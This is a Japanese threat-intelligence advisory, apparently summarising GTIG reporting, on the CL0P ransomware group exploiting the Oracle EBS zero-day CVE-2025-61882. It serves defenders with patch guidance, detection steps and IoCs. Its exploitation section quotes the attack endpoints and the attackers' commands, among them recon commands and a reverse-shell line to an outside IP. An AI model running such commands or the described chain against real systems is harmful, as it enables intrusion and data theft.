概要:Oracle EBSゼロデイ脆弱性がCL0Pランサムウェアに悪用される
Google脅威インテリジェンスグループ(GTIG)は、CL0PランサムウェアグループがOracle E-Business Suite(EBS)のゼロデイ脆弱性(CVE-2025-61882)を積極的に悪用していることに対し、緊急の警告を発しました。Oracle EBSを利用する組織は、直ちに10月4日にリリースされた緊急パッチを適用し、データベース内の悪意のあるテンプレートを特定・除去する必要があります。
攻撃キャンペーンの詳細
2025年9月29日以降、GTIGとMandiantは、数十の組織の幹部を標的とした大規模なメールキャンペーンを確認しました。このキャンペーンでは、Oracle EBS環境から機密データが盗まれたと主張し、侵害された数百のサードパーティアカウントから送信されました。メールには、8月中旬にさかのぼる正規のファイルリストが含まれていました。CL0Pのデータ漏洩サイト(DLS)にはまだ被害者が掲載されていませんが、過去のキャンペーンから、データは最初の接触から数週間後に公開される可能性があります。
脆弱性とパッチの状況
Oracleは10月2日、悪用された脆弱性が7月のCritical Patch Updateで既にパッチ適用済みであると報告し、顧客に最新のCPUを直ちに適用するよう促しました。その2日後の10月4日には、OracleはCVE-2025-61882に特化した緊急修正プログラムをリリースし、すべてのパッチを最新の状態に保つことの重要性を改めて強調しました。
多段階Javaインプラントフレームワークによる悪用
GTIGの分析によると、このキャンペーンはCL0Pアクターによるもので、数ヶ月にわたる侵入活動が確認されています。初期の悪用は7月10日には始まっていた可能性がありますが、8月9日までにはゼロデイ脆弱性(CVE-2025-61882)がUiServletおよびSyncServletコンポーネントに対して積極的に悪用されていました。
この多段階Javaインプラントフレームワークは、サーバーサイドリクエストフォージェリ(SSRF)、CRLFインジェクション、認証バイパス、XSLテンプレートインジェクションを組み合わせてリモートコード実行(RCE)を実現します。8月には、攻撃者は以下のリクエストを通じてSyncServletを悪用しました。
POST /OA_HTML/SyncServlet
その後、XDO Template Managerを悪用して、悪意のあるXSLペイロードをXDO_TEMPLATES_Bテーブルにアップロードしました。以下のテンプレートプレビューリクエストがペイロードの実行をトリガーします。
/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG &TemplateCode=TMP|DEF<16_RANDOM_HEX>&TemplateType=XSL-TEXT
XSLペイロードはBase64エンコードされたJavaインプラントをデコードし、ScriptEngineをインスタンス化して、攻撃者によって制御されるコードを評価します。「applmgr」アカウントで実行されたコマンドの例には、システム偵察(cat /etc/fstab、df -h、ip addr)やリバースシェル接続(bash -i >& /dev/tcp/200.107.207.26/53 0>&1)が含まれます。
GOLDVEIN.JAVAダウンローダーと、SAGE*リフレクティブローダーシーケンス(最終的にSAGEWAVEに至る)という2つの異なるJavaチェーンが、セカンドステージペイロードの取得と永続的なフィルターのインストールを可能にします。
推奨される対策
最も重要な最初のステップは、CVE-2025-61882に対するOracleの10月4日緊急パッチを遅滞なく適用することです。パッチ展開後、防御側は悪意のあるテンプレートを特定するための以下の対策を講じるべきです。
TEMPLATE_CODEが「TMP」または「DEF」で始まるエントリを確認する。- EBSサーバーからの外部インターネットアクセスを制限し、C2通信をブロックする。
/OA_HTML/configurator/UiServletおよびTemplatePreviewPGエンドポイントへの異常なリクエストがないかネットワークログを監視する。- Javaプロセスに対してメモリフォレンジックを実施し、ディスク上では見えないメモリ内インプラントを検出する。
このキャンペーンは、ゼロデイ悪用と遅延型恐喝を組み合わせる戦略的優位性を浮き彫りにしています。公開されているエンタープライズアプリケーションを標的とすることで、CL0P関連のアクターは早期検出を回避しながら、大規模なデータ流出を迅速に実行できます。CL0Pグループが2020年から2025年にかけてゼロデイを悪用してきた歴史を考慮すると、組織は常に標的となる可能性を認識し、厳格なパッチ適用と監視体制を維持する必要があります。
侵害の痕跡(IoC)
以下のネットワーク指標が、悪用試行に関連していることが確認されています。
- 200.107.207.26: UiServletおよびSyncServletコンポーネントを標的とした悪用試行で観測されたIPアドレス。
- 161.97.99.49: UiServletコンponentを標的とした悪用試行で観測されたIPアドレス。
- 162.55.17.215:443: GOLDVEIN.JAVA C2サーバー。
- 104.194.11.200:443: GOLDVEIN.JAVA C2サーバー。
- /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG…: 悪意のあるXSLペイロードのトリガー試行を示す。TemplateCodeがTMPまたはDEFで始まるリクエストに注意。
- /OA_HTML/configurator/UiServlet: 2025年7月の悪用活動で標的とされたエンドポイント。
- /OA_HTML/SyncServlet: 2025年8月の悪用活動で標的とされたエンドポイント。
- /help/state/content/destination./navId.1/navvSetId.iHelp/: SAGEWAVEによってフィルタリングされるHTTPパスのサブストリング。